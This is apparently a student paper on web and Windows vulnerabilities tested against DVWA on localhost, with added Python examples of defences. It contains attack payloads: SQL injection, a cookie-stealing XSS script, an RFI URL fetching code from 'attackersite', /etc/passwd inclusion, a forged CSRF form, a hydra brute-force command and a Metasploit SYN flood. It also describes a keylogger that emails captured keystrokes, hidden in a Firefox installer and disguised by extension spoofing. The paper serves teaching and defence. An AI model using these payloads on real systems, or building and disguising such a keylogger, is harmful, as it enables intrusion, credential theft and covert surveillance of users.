Abstract— To analyse vulnerabilities that apply to websites and to Microsoft Windows operating systems, Kali Linux was installed on a virtual machine so that Metasploit Framework and Burp Suite could be used to pentest websites for the most common vulnerabilities. The vulnerabilities analysed here are: SQL Injection, Cross Site Scripting, Remote File Inclusion, Local File Inclusion, Cross-Site Request Forgery, File Upload, Brute Force and DDoS. In the second part, Microsoft Visual Studio was used to develop a keylogger, which was combined with Microsoft Windows vulnerabilities in order to exploit them. Methods to protect against these vulnerabilities and to fix them are also presented.
Keywords—vulnerabilities analysis; web vulnerabilities; windows os vulnerabilities; Metasploit pentesting; kali linux pentesting; sql injection pentesting; keylogger exe
I. INTRODUCTION
In computer security, a vulnerability is a weakness that can be exploited by a threat actor, such as an attacker, to perform unauthorized actions within a computer system. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface.
Vulnerability management is the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities. This practice generally refers to software vulnerabilities in computing systems.
A security risk is often incorrectly classified as a vulnerability. The use of vulnerability with the same meaning of risk can lead to confusion. The risk is the potential of a significant impact resulting from the exploit of a vulnerability. Then there are vulnerabilities without risk: for example when the affected asset has no value. A vulnerability with one or more known instances of working and fully implemented attacks is classified as an exploitable vulnerability—a vulnerability for which an exploit exists. The window of vulnerability is the time from when the security hole was introduced or manifested in deployed software, to when access was removed, a security fix was available/deployed, or the attacker was disabled—see zero-day attack.
A security bug (security defect) is a narrower concept: there are vulnerabilities that are not related to software; hardware, site and personnel vulnerabilities are examples of vulnerabilities that are not software security bugs.[1]
In computers and computer networks, an attack is any attempt to expose, alter, disable, destroy, steal or gain unauthorized access to or make unauthorized use of an asset. A cyberattack is any type of offensive maneuver that targets computer information systems, infrastructures, computer networks, or personal computer devices.
A cyberattack may steal, alter, or destroy a specified target by hacking into a susceptible system. Cyberattacks can range from installing spyware on a personal computer to attempting to destroy the infrastructure of entire nations. Legal experts are seeking to limit the use of the term to incidents causing physical damage, distinguishing it from the more routine data breaches and broader hacking activities.[2]
This paper is structured as follows: Section II provides theoretical fundamentals on the vulnerabilities that are analysed. Section III presents methods to prevent and fix these vulnerabilities together with the implementation of the attacks. The results and practical implementation of the vulnerabilities are presented in Section IV. The final section provides the conclusions.
II. THEORETICAL FUNDAMENTALS ON VULNERABILITIES
• SQL Injection:
An SQL Injection vulnerability occurs when an attacker can insert arbitrary data into an SQL query or, through syntax injection, modify the logic of the statement so that it executes a different action. SQL injection can be critical for the system but, despite the danger it represents, it is one of the most common vulnerabilities.
• Cross Site Scripting:
Cross Site Scripting (XSS) is a web vulnerability that allows the attacker to inject malicious code into a web page. This code can affect other users who view the infected page, which shows that this vulnerability is client-side. This vulnerability is dangerous only when the code is used to steal “cookies” or user sessions.
• Remote File Inclusion:
Remote File Inclusion is a vulnerability that abuses the include functions of server-side programming languages such as PHP to execute code from a remote file stored on a different server. Attackers host malicious files and then take advantage of inadequate sanitization of user input to modify or inject an include call in the PHP code of the victim’s site.
• Local File Inclusion:
Local File Inclusion can occur when user input is able to modify the relative or absolute path of the files included on the server. Attackers can use this vector to read or write sensitive local files such as configuration files containing database credentials.
• Cross-Site Request Forgery:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests such as transferring funds or changing an email address, not theft of data, since the attacker has no way to see the response to the forged request.[7]
• File Upload:
File Upload is a type of vulnerability that occurs in web applications when the type of the uploaded file is not checked, filtered or sanitized. The main danger is that the attacker can upload a malicious PHP script and execute it; the goal is to gain access to the server and run the desired code. For example, an attacker who has found such a vulnerability can upload a malicious shell script and then make the machine execute arbitrary commands, which leads to a full compromise of the server and of the site.
• Brute Force Attack:
A Brute-Force attack occurs when an attacker uses a set of predefined values against a target and analyses the response until he succeeds. The most common and easiest to understand example of a brute-force attack is the dictionary attack used to crack a password: the attacker uses a password dictionary containing millions of words that could be used as a password.
• DDOS:
A Distributed Denial-Of-Service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic.[8]
• Keylogger:
A keylogger is a tool whose purpose is to record (log) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. The data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware.
• File Binder:
A File Binder is a program that can bundle files of multiple types together and allow them all to execute when the user opens the bound module. This can have entirely innocent or more malicious applications. One reason to use a file binder is to hide files. This can be a security measure in some settings, and in other cases, it can have malicious applications.
• File Extension Spoofing:
A Spoofing Attack is a situation in which a person or program successfully masquerades as another by falsifying data to gain an illegitimate advantage. File Extension Spoofing is a method by which attackers modify the extension of malicious executable files and make them appear to be other types of files; for example, an executable file can be made to look like a .pdf file or an image without the victim realizing that he is running an infected executable.
III. IMPLEMENTATION AND PREVENTING VULNERABILITIES
• SQL Injection:
In order for an SQL Injection attack to take place, the vulnerable website needs to include user input directly within an SQL statement. An attacker can then insert a payload that will be included as part of the SQL query and run against the database server. A simple example of an SQL Injection payload is setting the password field to password' OR 1=1.
This would result in the following SQL query being run against the database server.
SELECT id FROM users WHERE username='username' AND password='password' OR 1=1'
An attacker can also comment out the rest of the SQL statement to control the execution of the query further. The result of this operation is the list of all records that satisfy the expression, i.e. every user’s database entry.
Methods to prevent SQL Injection
There are specific measures that can be taken within the database and the application layer.
• Using well-defined variables and database column definitions
• Assign query results to a well-defined variable
• Data length limitation
• Avoid creating queries by concatenating strings
• Applying data separation and role-based access within the database [3]
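As an added illustration of the last two measures (this code is not from the paper; it uses Python’s built-in sqlite3 module with a constructed three-row users table, since the paper does not give its schema), the functions below put the concatenated query the paper describes next to its parameterised equivalent and run both against the same injected input, which comments out the rest of the statement with “--”:

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2"), ("bob", "letmein")])
    return conn


def login_concat(conn, username, password):
    """Vulnerable: user input is pasted into the SQL text, exactly the
    pattern of the paper's SELECT ... WHERE password='...' example."""
    sql = ("SELECT id FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return sorted(row[0] for row in conn.execute(sql))


def login_param(conn, username, password):
    """Hardened: the statement text is fixed and the values are bound
    parameters, so a quote in the input can never change the query's logic."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def demo():
    """Run both versions with a correct password and with an injection payload."""
    conn = make_db()
    payload = "' OR 1=1 --"      # closes the string, adds OR 1=1, comments out the rest
    return {
        "param_ok": login_param(conn, "alice", "hunter2"),        # [2]
        "concat_injected": login_concat(conn, "alice", payload),  # [1, 2, 3]: every row
        "param_injected": login_param(conn, "alice", payload),    # []: no such password
    }


if __name__ == "__main__":
    print(demo())
```

With the payload, the concatenated statement becomes WHERE username='alice' AND password='' OR 1=1 --', which is true for every row; the parameterised version compares the literal string “' OR 1=1 --” against the stored password and matches nothing. Length limits and typed columns (the earlier bullets) reduce what an attacker can send, but only the fixed statement text removes the problem.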
• Cross Site Scripting:
In this vulnerability the attacker injects a payload into the website’s database by submitting a vulnerable form with some malicious JavaScript. The victim requests the web page from the website. The website serves the victim’s browser the page with the attacker’s payload as part of the HTML body. The victim’s browser executes the malicious script inside the HTML body; in this case it sends the victim’s cookie to the attacker’s server. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives at the server, after which the attacker can use the stolen cookie for impersonation.
XSS is classified in two categories: Stored and Reflected. Stored XSS is saved in the website’s database, while Reflected XSS affects the user only if he accesses the malicious page link.
This vulnerability can be fixed easily because the PHP programming language provides two functions, htmlentities and htmlspecialchars, that convert the special characters “<”, “>”, “&” and quotation marks into HTML entities, so the web browser will display the text but will not execute the code maliciously introduced by the attacker.[4]
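The same output-encoding step, shown here in Python as an added example (not code from the paper or from DVWA): html.escape performs the conversion the paper attributes to htmlspecialchars, and the guestbook entries are constructed sample data that include the script string used later in the paper plus an attribute break-out, so both text and attribute contexts are covered.

```python
import html

# Constructed guestbook rows: one stored-XSS payload in the message body,
# one attempt to break out of a quoted attribute through the author name.
GUESTBOOK = [
    {"name": "mallory", "message": "<script>alert(document.cookie)</script>"},
    {"name": 'x" onmouseover="alert(1)', "message": "hello"},
    {"name": "alice", "message": "Tom & Jerry > cats"},
]


def render_entry_unsafe(entry):
    """Vulnerable: stored input is written back into the HTML untouched."""
    return '<div class="entry" data-author="%s">%s</div>' % (
        entry["name"], entry["message"])


def render_entry_safe(entry):
    """Hardened: html.escape(quote=True) turns < > & " ' into entities, the
    conversion the text describes for htmlspecialchars, in BOTH the text
    node and the quoted attribute."""
    return '<div class="entry" data-author="%s">%s</div>' % (
        html.escape(entry["name"], quote=True),
        html.escape(entry["message"], quote=True))


def render_page(entries, safe=True):
    render = render_entry_safe if safe else render_entry_unsafe
    return "\n".join(render(e) for e in entries)


def contains_live_markup(rendered):
    """Check used below: does a tag or an attribute break-out survive rendering?"""
    return "<script" in rendered or '" onmouseover=' in rendered


if __name__ == "__main__":
    print(render_page(GUESTBOOK))
```

Escaping must match the context the data lands in: the attribute case shows why the quote characters matter, and in PHP that means passing ENT_QUOTES to htmlspecialchars, since older versions leave the single quote alone by default. Data placed inside a <script> block or a URL needs a different encoder; entity encoding alone is not enough there.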
• Remote File Inclusion:
To test this vulnerability, let’s assume we have found a vulnerable website:
http://sitevulnerable/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. We can find ways around it, as it uses the PHP include function to pull them in. We modify the page parameter, adding the path to our site where we have stored the malicious script:
http://vulnerablewebsite/index.php?page=http://attackersite/scriptmalicious.txt
If the malicious code is executed correctly, the attacker can modify, remove or read files on the site’s hosting provider, and the website is compromised.
In order to avoid this vulnerability, three important things should be done in the structure of the site:
• Do not use arbitrary input data in the request to include a file.
• Use a filter to clean the input parameters against possible file entries
• Build a dynamic white list.[9]
• Local File Inclusion:
To test this vulnerability, let’s say that I have a site that displays a page via page=contact.php; I modify the link with the path of a sensitive file, url/index.php?page=etc/passwd, which will display its content. By this you can see users’ passwords if the site is hosted on Unix, or sensitive Windows files such as boot.ini.
This vulnerability can be avoided just like RFI, using a switch for the pages that can be included and filtering the “../” and “..\” strings.[9]
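The “switch / white list” defence recommended for both RFI and LFI above, written out in Python as an added example (not the paper’s code, and not DVWA’s): the ?page= value is only ever used as a key into a fixed map, so a URL, an absolute path or a “../” sequence never reaches the include call. The template directory and page names are assumed. A second function flags the same patterns for anyone scanning access logs for attempts.

```python
import posixpath

# Constructed allow-list: ?page=<key> maps to a fixed file name. The directory
# layout is assumed; the paper does not give the real one.
TEMPLATE_ROOT = "/var/www/site/pages"
PAGES = {"home": "home.php", "contact": "contact.php", "about": "about.php"}

SENSITIVE_MARKERS = ("etc/passwd", "boot.ini")         # the two files the text names
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")


def resolve_include(page_param):
    """Return the absolute file to include for ?page=..., or None to refuse.

    Only keys of PAGES are accepted, so remote URLs (RFI), absolute paths
    and '../' traversal (LFI) are rejected before any file access happens."""
    if not isinstance(page_param, str):
        return None
    filename = PAGES.get(page_param)
    if filename is None:
        return None
    # Defence in depth: even a mapped name must resolve inside TEMPLATE_ROOT.
    full = posixpath.normpath(posixpath.join(TEMPLATE_ROOT, filename))
    if posixpath.commonpath([full, TEMPLATE_ROOT]) != TEMPLATE_ROOT:
        return None
    return full


def looks_like_inclusion_probe(page_param):
    """Detection side: does a ?page= value match the patterns the paper
    describes (remote URL, traversal, absolute path, a sensitive file name)?"""
    p = page_param.lower()
    return (p.startswith(REMOTE_SCHEMES)
            or "../" in p or "..\\" in p
            or p.startswith("/") or "\x00" in p
            or any(marker in p for marker in SENSITIVE_MARKERS))


if __name__ == "__main__":
    for value in ("home", "http://attackersite/scriptmalicious.txt", "../../etc/passwd"):
        print(value, "->", resolve_include(value), "probe:", looks_like_inclusion_probe(value))
```

The allow-list is the measure that actually closes the hole; the probe detector is there because rejected requests are worth logging, and because filtering “../” on its own (the fallback the text mentions) misses URL-encoded and null-byte variants that a map lookup never has to reason about.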
• Cross-Site Request Forgery:
In a CSRF attack the attacker delivers to the victim, by some means, a link containing the forged request; when the victim accesses the link, the request crafted by the attacker is validated by the server without the user knowing, in this case transferring an amount of money from the user’s account to another account chosen by the attacker.
A CSRF attack can generally be recognized through links in comments that send us, for example, to the administration panel, or through image tags like:
<img src="http://mysite/privatepage?privateaction"/>
Methods to prevent CSRF:
To prevent this vulnerability, you must take some control measures in the web application:
• Transmitting information through POST
• HTTP_REFERER verification
• Adding captcha verification and implementing of unpredictable token.[7]
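The three measures above (POST only, Referer/Origin check, unpredictable per-session token) combined into one request gate, as an added Python example that is not the paper’s code: the session store, the site origin “http://localhost” and the field name csrf_token are assumptions. The hidden-field GET form shown later in the paper would fail every one of these checks.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://localhost"   # assumed origin of the protected application


class SessionStore:
    """Constructed stand-in for the server-side session: one token per session."""

    def __init__(self):
        self._tokens = {}

    def issue_token(self, session_id):
        token = secrets.token_hex(32)        # 256 random bits, unguessable
        self._tokens[session_id] = token
        return token

    def expected_token(self, session_id):
        return self._tokens.get(session_id)


def hidden_field(token):
    """Markup the server puts in its own forms so genuine submissions carry the token."""
    return '<input type="hidden" name="csrf_token" value="%s">' % token


def request_allowed(store, session_id, method, form, headers):
    """Gate for a state-changing request such as a password change."""
    # 1. State changes travel by POST; a GET built into an <img> or a link is refused.
    if method != "POST":
        return False
    # 2. Origin (or, failing that, Referer) must name this site.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    if "%s://%s" % (parts.scheme, parts.netloc) != SITE_ORIGIN:
        return False
    # 3. The per-session token must be present and match, compared in constant time.
    expected = store.expected_token(session_id)
    supplied = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    return True


if __name__ == "__main__":
    store = SessionStore()
    tok = store.issue_token("sess1")
    print(hidden_field(tok))
    print(request_allowed(store, "sess1", "POST",
                          {"password_new": "x", "password_conf": "x", "csrf_token": tok},
                          {"Origin": "http://localhost"}))
```

The token check is the one that carries the weight: the Referer header can be absent (privacy settings, some proxies) and the POST rule only raises the bar, so a missing or wrong token must always be a hard refusal. A token that never changes, or that is shared across users, is predictable and defeats the purpose.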
• File Upload:
To exploit this vulnerability on a site with file upload we have to upload a malicious PHP file. The file can be uploaded by tricking the site with several methods: uploading the file with an alternative extension that the server still treats as executable; finding server configuration flaws by providing a sensitive extension after a delimiter, e.g. “/file.jpg/index.php”; or bypassing the Content-Type header verification by changing this header in the request using a web proxy. If the attacker succeeds in uploading the malicious PHP file, he can modify or delete configuration files, compromising the site.
Methods to avoid File Upload Vulnerability
In order to avoid this vulnerability you must do the following:
• Validation of file format and extension with white list and black list
• Sanitization of the files, use a virus scanner, check file size, add compression methods
• Save files outside the root, in a non-public folder[5]
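An upload validator that applies the list above, added here as an example (not the paper’s code): extension allow-list, a size limit, magic-byte inspection of the content, and a server-chosen name under a directory outside the web root. The limit, the directory and the allowed set are assumptions. The Content-Type header is received but ignored on purpose, since the paper shows it is attacker-controlled through an intercepting proxy; the test feeds it the three bypasses the text describes.

```python
import posixpath
import secrets

# Allow-list of extensions together with the magic bytes a genuine file must start with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
MAX_SIZE = 2 * 1024 * 1024       # assumed 2 MiB limit
UPLOAD_DIR = "/var/uploads"      # assumed directory outside the web root


def validate_upload(filename, content_type, data):
    """Return (True, extension) when the file is acceptable, else (False, reason).

    content_type is deliberately not consulted: a client can send any value."""
    if len(data) > MAX_SIZE:
        return False, "too large"
    base = posixpath.basename(filename.replace("\\", "/"))
    if not base or base != filename:
        return False, "invalid filename"              # e.g. /file.jpg/index.php
    if base.count(".") != 1:
        return False, "unexpected dotted name"        # e.g. shell.php.jpg
    ext = base.rsplit(".", 1)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None:
        return False, "extension not in allow-list"   # e.g. shell.php
    if not data.startswith(magic):
        return False, "content does not match extension"   # PHP text named .jpg
    return True, ext


def store_path(filename, content_type, data):
    """Where the file would be written, or None if rejected. The server
    generates the name; the client's name never reaches the filesystem."""
    ok, info = validate_upload(filename, content_type, data)
    if not ok:
        return None
    return posixpath.join(UPLOAD_DIR, "%s.%s" % (secrets.token_hex(16), info))


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32          # constructed JPEG header
    print(validate_upload("photo.jpg", "image/jpeg", jpeg))
    print(validate_upload("shell.jpg", "image/jpg", b"<?php echo 'hi'; ?>"))
```

Storing outside the document root matters even when every check passes: a file that is never reachable by URL cannot be executed by the web server, which removes the consequence the text warns about regardless of what slipped through validation. Magic-byte checks are a filter, not a proof; a virus scanner and image re-encoding (the “compression methods” bullet) add further layers.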
• Brute Force Attack:
Brute Force attacks are difficult, if not impossible, to carry out manually. Instead, hackers write simple scripts, called bots, that carry out thousands of these break-in attempts against websites on auto-pilot. Typically, these bots are custom-written by the attackers and designed to be easily distributed across many hacked machines. These groups of bots, or botnets, work in conjunction with other commonly accessible tools that either generate thousands of passwords or use a wordlist. Brute Force attacks on a site can continue indefinitely, until the bot either discovers a username/password combination that will let the attacker into the back end of your website, or the bot runs out of passwords to check. [6]
To prevent password cracking by a Brute-Force attack, one should always use long and complex passwords. This makes it hard for the attacker to guess the password, and brute-force attacks will take too much time.
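Long passwords make the wordlist run described above fail; the server can also notice the run while it happens. The following detector, added here as an example and not taken from the paper, scans constructed login-log lines for a burst of failures from one address inside a sliding window and then refuses further attempts from that address for a lockout period. The log format, threshold and lockout length are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed application log: five failures in three seconds from one address
# (a wordlist run), a success right after, then two isolated failures from another.
LOG = """\
2018-10-10T13:55:30 LOGIN_FAIL ip=127.0.0.1 user=admin
2018-10-10T13:55:30 LOGIN_FAIL ip=127.0.0.1 user=admin
2018-10-10T13:55:31 LOGIN_FAIL ip=127.0.0.1 user=admin
2018-10-10T13:55:31 LOGIN_FAIL ip=127.0.0.1 user=admin
2018-10-10T13:55:32 LOGIN_FAIL ip=127.0.0.1 user=admin
2018-10-10T13:55:33 LOGIN_OK ip=127.0.0.1 user=admin
2018-10-10T13:58:00 LOGIN_FAIL ip=10.0.0.7 user=alice
2018-10-10T14:10:00 LOGIN_FAIL ip=10.0.0.7 user=alice
"""
LINE_RE = re.compile(r"^(\S+) (LOGIN_FAIL|LOGIN_OK) ip=(\S+) user=(\S+)$")


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: ISO timestamp} for every IP that logged `threshold` failures
    inside any sliding window of `window_seconds`, with the time the threshold
    was first crossed. A later successful login does not clear the flag: a
    guessed password that finally worked is exactly the event to investigate."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)
    flagged = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                          # ignore lines in another format
        ts = datetime.fromisoformat(m.group(1))
        event, ip = m.group(2), m.group(3)
        if event != "LOGIN_FAIL":
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:       # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts.isoformat()
    return flagged


def login_allowed(ip, flagged, now_iso, lockout_minutes=15):
    """Enforcement: refuse attempts from a flagged IP until the lockout has passed."""
    hit = flagged.get(ip)
    if hit is None:
        return True
    return datetime.fromisoformat(now_iso) - datetime.fromisoformat(hit) > timedelta(minutes=lockout_minutes)


if __name__ == "__main__":
    print(detect_bruteforce(LOG))
```

Keying on the source address alone is the simplest rule and the one a distributed botnet, as described in the quoted text, evades; in practice the same window is also counted per target account, and a CAPTCHA or progressive delay is applied before a hard lockout so that an attacker cannot lock legitimate users out of their own accounts.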
• DDOS:
Once the attacker controls a large botnet and launches the attack on a site, the site starts running very slowly, pages load with difficulty, and then the site becomes unavailable as the server crashes. While nearly all DDoS attacks involve overwhelming a target device or network with traffic, attacks can be divided into three categories: application, protocol and volumetric attacks. An attacker may use one or multiple different attack vectors, or cycle attack vectors based on the countermeasures taken by the target.[8]
The biggest problem in stopping this kind of attack is separating the bad traffic from the normal traffic of legitimate users. There are online services against this attack, such as Cloudflare, but if the attack is very powerful, with a large bandwidth, the web administrator cannot do anything until the attacker stops the attack.
• Keylogger:
This keylogger is developed in Microsoft Visual Studio and has a structure with five methods and one object.
• The object is a string path that calls the Environment.GetFolderPath method and returns the location where the log file is saved.
• The first method is GetAsyncKeyState, which determines whether a key is pressed or not.
• The second method is Main, whose body calls the Start method of the Program class.
• The third method is Start, which starts the program process.
• The fourth method is verifyKey, which checks which key has been pressed.
• The fifth method is sendEmail, which sends the logs to the configured email address.
In order to avoid infection with keyloggers you must use anti-keylogger software or an antivirus. Furthermore, you must keep your operating system updated and use the operating system’s preinstalled firewall.
• File Binder:
Protecting against file binders is quite hard because you cannot tell from the start what an executable file contains, but you can check the file manager after you have installed that executable to see whether there are suspicious programs running.
• File Extension Spoofing:
To avoid this kind of vulnerability you must keep your antivirus updated, because if the file is a virus it will be detected. Furthermore, you must take care with the files you download from the internet; it is recommended to download from official servers and from trusted websites.
IV. RESULTS AND PRACTICAL IMPLEMENTATION
• SQL Injection:
I have tested the SQLi vulnerability on DVWA on a form where you can search names in the database. After exploiting this vulnerability and finding out that the table users contains user names and passwords, I pasted this code into the search form: 1' and 1=1 union select user, password from users# which returned the users and their passwords as MD5 hashes. I cracked the MD5 hash of admin and got admin’s password.
Fig. 1. Username and password as hash from database
Fig. 2. Password decrypted from Hash
• Cross Site Scripting
I tested this vulnerability on a page that has a sign-guestbook form, and I managed to execute JavaScript code to steal cookies from users that access that page by adding this code into the message box: <script>alert(document.cookie)</script>
After stealing the cookie I can use it to log in to their accounts with their cookies using Tamper Data. You can see that I managed to implement a reflected XSS on a page and steal the user’s cookies.
Fig. 3. Cookie from Reflected Cross Site Scripting
Fig. 4. Cookie from Stored Cross Site Scripting
• Remote File Inclusion:
In order to test this vulnerability I uploaded a malicious PHP script called ShellC99 on a different host to execute different operations on the vulnerable site.
Fig. 5. Remote File Inclusion Vulnerability Exploited
• Local File Inclusion:
On this vulnerability I modified on a page the parameter page=include.php, which is the storage location, to page=/etc/passwd. As you can see in figure 5, I listed the whole passwd file from *nix with the usernames in it.
Fig. 6. Local File Inclusion Vulnerability Exploited and displaying Linux System Files
• Cross-Site Request Forgery
I tested this vulnerability on a password-changing form. I modified the form from the page source by adding a value to the password input, in my case value="test123", and I saved the password-changing form to a new HTML file. I also changed its text to something else, in my case a page that says “boost your computer”. When the HTML file is accessed and the button clicked, the password changes automatically without the victim knowing.
The code that modifies the password is:
<form action="http://localhost/dvwa/vulnerabilities/csrf/?" method="GET">Click here to boost computer performance!<br />
<input type="hidden" AUTOCOMPLETE="off" name="password_new" value="test123">
<input type="hidden" AUTOCOMPLETE="off" name="password_conf" value="test123">
<input type="submit" value="Boost PC" name="Change">
</form>
After the button from the HTML code is pressed, the password automatically changes to the one typed in the code.
Fig. 7. Cross Site Request Forgery Vulnerability Exploited by changing user password
• File Upload
I will try to upload a PHP file on an image hosting site. In order to trick the site into believing my PHP file is an image, I intercept the traffic with Burp Suite and modify the request by changing the content type to image/jpg. By doing this the website will accept the PHP file, considering it an image.
Fig. 8. File Upload Vulnerability Exploited by uploading a Shell that was masked in a jpg file
• Brute Force Attack
In order to do a Brute Force attack I will use Kali Linux and the password list from the john software. For this I need the user cookie and session ID, which I get with Burp Suite. The command that brute-forces the DVWA page is:
hydra 127.0.0.1 -l admin -P /usr/share/john/password.lst http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H-Cookie: security=low; PHPSESSID=0h6htvhn74l1bp5oj41n3j9dhg"
Fig. 9. Representation of a brute force attack using Kali Linux
• DDOS:
In order to do a DDoS attack I will use the Metasploit Framework from Kali Linux to SYN flood my router IP. I start Metasploit by typing msfconsole in a terminal, then the command use auxiliary/dos/tcp/synflood. After that I set the parameters for the attack and then type exploit:
set RHOST 192.168.1.254
set RPORT 8899
Fig. 10. Representation of a DDoS attack using Metasploit Framework from Kali Linux
• Keylogger:
This keylogger, made in C#, records what you type on the keyboard and saves everything to a hidden file called log.txt in the user folder. It has a feature that sends the logs from the computer to a configured email address every 2 minutes.
Fig. 11. Screenshot of an email sent by the keylogger
• File Binder:
In order to use this exploit I downloaded a File Binder from the internet and merged two executable files, in my case the Firefox installer and the Keylogger. By binding these two files, the victim launches the Firefox installer and the Keylogger automatically launches in the background without alerting or showing anything to the victim. I also changed the icon of the bound output file to the Firefox icon, exactly like the installer, so I can say that I theoretically hid the Keylogger in the Firefox installer.
Fig. 12. Keylogger bound with the Mozilla Firefox installer
• File Extension Spoofing:
In order to test this vulnerability I downloaded WinRAR 4.2, which is vulnerable to file extension spoofing. I archived the Keylogger as .zip and opened the archive with a hex editor. Searching in the hex editor for the executable from the archive, I found two results: one at the beginning and one at the end. By modifying the extension of the executable at the end to, let’s say, .jpg and saving the archive, WinRAR will open it and show it as an image file. So if you double-click the image in the WinRAR archive, it will launch as the executable it was before.
Fig. 13. Keylogger exe extension spoofed with a jpg file
V. CONCLUSION
This paper presents a study on web vulnerabilities and Microsoft Windows vulnerabilities. The most widespread web vulnerabilities are presented in detail, then methods to protect against them are explained, and in the experimental results part the vulnerabilities are exploited on a web application called DVWA (Damn Vulnerable Web App) hosted on an Apache server on localhost.
In the second part a keylogger was created in C# that allows you to monitor the keyboard and send logs to a configured email address every 2 minutes. At the same time there is a brief presentation of some Windows vulnerabilities through which the created keylogger can be spread, and the exploitation of the presented vulnerabilities on Windows 8.
REFERENCES
[1] Foreman, P.: Vulnerability Management, page 1. Taylor & Francis Group, 2010.
[2] Lin, Tom C. W. (14 April 2016). “Financial Weapons of War”. ssrn.com
[3] Acunetix.com, Web Security: SQL Injection
[4] Acunetix.com, Web Security: Cross Site Scripting
[5] Improve File Uploaders’ Protections – Bypass Methods, Rev. 1.0
[6] Wordfence, Brute Force Attacks: Introduction
[7] OWASP, Cross-Site Request Forgery (CSRF)
[8] Cloudflare, What is a DDoS Attack
[9] eSecurityPlanet, How to Prevent Remote File Inclusion (RFI) Attacks